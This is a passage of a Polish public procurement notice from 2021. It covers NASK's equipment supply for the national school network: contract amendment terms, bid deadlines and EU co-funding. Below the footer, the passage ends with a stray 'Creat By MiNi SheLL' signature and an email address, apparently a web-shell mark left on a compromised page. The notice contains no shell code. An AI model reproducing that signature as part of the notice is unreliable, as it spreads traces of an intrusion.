wykluczeniu z postępowania. 5. W przypadku wspólnego ubieganiasię o zamówienie przez wykonawców, oświadczenie o braku podstaw do wykluczenia orazpodmiotowe środki dowodowe składa każdy z wykonawców wspólnie ubiegających się ozamówienie. 6. W przypadku, gdy najwyżej zostanie oceniona oferta złożona przezwykonawców występujących wspólnie, a także gdy Zamawiający skorzysta z uprawnienia, októrym mowa w art. 274 ust. 2 ustawy Pzp, każdy z wykonawców przedstawia podmiotoweśrodki dowodowe służące potwierdzeniu braku podstaw do wykluczenia. Pozostałe podmiotoweśrodki dowodowe mogą być złożone wspólnie.7. Wykonawcy, którzy złożyli ofertę wspólnąodpowiadają solidarnie za realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zamawiający przewiduje zmiany zawartej Umowy w stosunku do treści oferty, stanowiącej Załącznik nr 1 do Umowy. 2.	Przewiduje się zmianę terminu realizacji Przedmiotu Umowy:1)	gdy dochowanie terminu jest niemożliwe z uwagi na wystąpienie Siły wyższej określonej w § 14 , która ma bezpośredni wpływ na terminowość wykonywania Przedmiotu Umowy; 2)	w razie wystąpienia okoliczności niezależnych od Stron lub których Strony przy zachowaniu należytej staranności nie były w stanie uniknąć lub przewidzieć;3)	gdy konieczne okaże się przedłużenie terminu dostawy, z przyczyn organizacyjnych leżących po stronie Zamawiającego;- nie dłużej jednak niż o 10 dni (kalendarzowych) w ww. przypadkach.3.	Możliwa jest zmiana Umowy:1)	w przypadku zmian obowiązujących w przepisach prawa, powodujących konieczność dokonania zmian w Umowie;2)	w innych przypadkach niezależnych od Zamawiającego lub Wykonawcy, a niepozwalających na realizację Umowy zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia oraz postanowieniami Umowy;- w opisanych przypadkach zmianie (w tym ograniczeniu) ulec może odpowiednio zakres rzeczowy przedmiotu zamówienia, termin wykonania przedmiotu zamówienia, sposób realizacji przedmiotu zamówienia;3)	w razie złożenia wniosku o likwidację Wykonawcy, producenta, dystrybutora lub gwaranta produktu/ usługi;4)	w przypadku istotnych problemów finansowych, ekonomicznych lub organizacyjnych Wykonawcy, producenta, dystrybutora lub gwaranta produktu/ usługi, uzasadniających ryzyko, że jego produkt/ usługi lub elementy świadczenia mogą nie zostać należycie wykonane lub nie będą miały odpowiedniej jakości;- w opisanych przypadkach zmianie (w tym ograniczeniu) ulec może odpowiednio zakres rzeczowy przedmiotu zamówienia, cena Umowy netto/ brutto, termin wykonania przedmiotu zamówienia, sposób realizacji przedmiotu zamówienia.5)	gdy wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony;6)	zmiany zakresu Przedmiotu Umowy powierzonego podwykonawcom;7) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym, a inną niż Wykonawcą stroną, w tym instytucjami nadzorującymi Zamawiającego, które mają bezpośredni wpływ na realizację Przedmiotu Umowy;8)	konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń, dotyczących Przedmiotu Umowy, instytucji nadzorującej, w szczególności w zakresie sprawozdawczości;4. W przypadku wycofania z produkcji/sprzedaży jakiegokolwiek modelu/typu Sprzętu wskazanego w Załączniku nr 1 do Umowy, Wykonawca dostarczy obecnie produkowany/sprzedawany model/typ Sprzętu o parametrach nie gorszych od wskazanych w Załączniku nr 1 do Umowy w ramach wynagrodzenia netto, o którym mowa w § 8 ust. 1 Umowy. W takim przypadku Wykonawca zobowiązany jest pisemnie i za pomocą poczty e-mail do poinformowania Zamawiającego oraz przedstawienia oświadczenia producenta/dystrybutora potwierdzającego fakt wycofania modelu/typu Sprzętu wskazanego w Załączniku nr 1 do Umowy wraz z konfiguracją Sprzętu obecnie produkowanego celem akceptacji przez Zamawiającego,5. W przypadku ujawnienia się powszechnie występujących wad oferowanego Sprzętu, Zamawiający dopuszcza zmianę polegającą na zastąpieniu w ramach wynagrodzenia netto, o którym mowa w § 8 ust. 1 Umowy danego produktu produktem zastępczym, spełniającym wszelkie wymagania przewidziane w Załączniku 2 do Umowy dla Sprzętu zastępowanego, rekomendowanym przez producenta lub Wykonawcę w związku z ujawnieniem wad. 6.	Zamawiający przewiduje wydłużenie terminu obowiązywania Umowy określonego w § 3 ust. 1, jednak nie dłużej niż o 3 miesiące, w przypadku zaistnienia po stronie Zamawiającego, nie dającej się przewidzieć w chwili zawarcia Umowy okoliczności, skutkującej koniecznością wydłużenia terminu obowiązywania Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nask.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach projektów: Budowa węzłów bezpieczeństwa szkolnego ruchu internetowego Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0001/18; Budowa sieci dostępu do Internetu Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0002/18; Budowa szkolnych sieci dostępowych Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0003/18 Programu Operacyjnego Polska Cyfrowa na lata 2014-2020, Oś Priorytetowa nr 1 „Powszechny dostęp do szybkiego Internetu” oraz ze środków budżetu państwa – dotacji celowej z Kancelarii Prezesa Rady Ministrów pt. Pełnienie zadań operatora Ogólnopolskiej Sieci Edukacyjnej, umowa nr 2/D/DT/2021.2.	Zamawiający dopuszcza udział podwykonawców w realizacji zamówienia. Powierzenie realizacji części zamówienia podwykonawcom nie zwalnia wykonawcy z odpowiedzialności za prawidłową realizację zamówienia.3.	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, których wykonanie zamierza powierzyć ewentualnym podwykonawcom i podania przez wykonawcę firm podwykonawców, o ile są już znani.4.	Zamawiając przewiduje możliwości udzielenia zamówienia, o którym mowa w art. 305 pkt 1) w zw. z art. 214 ust. 1 pkt 8) ustawy Pzp.5.	Zamawiający nie przewiduje wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2) ustawy Pzp.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-05 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com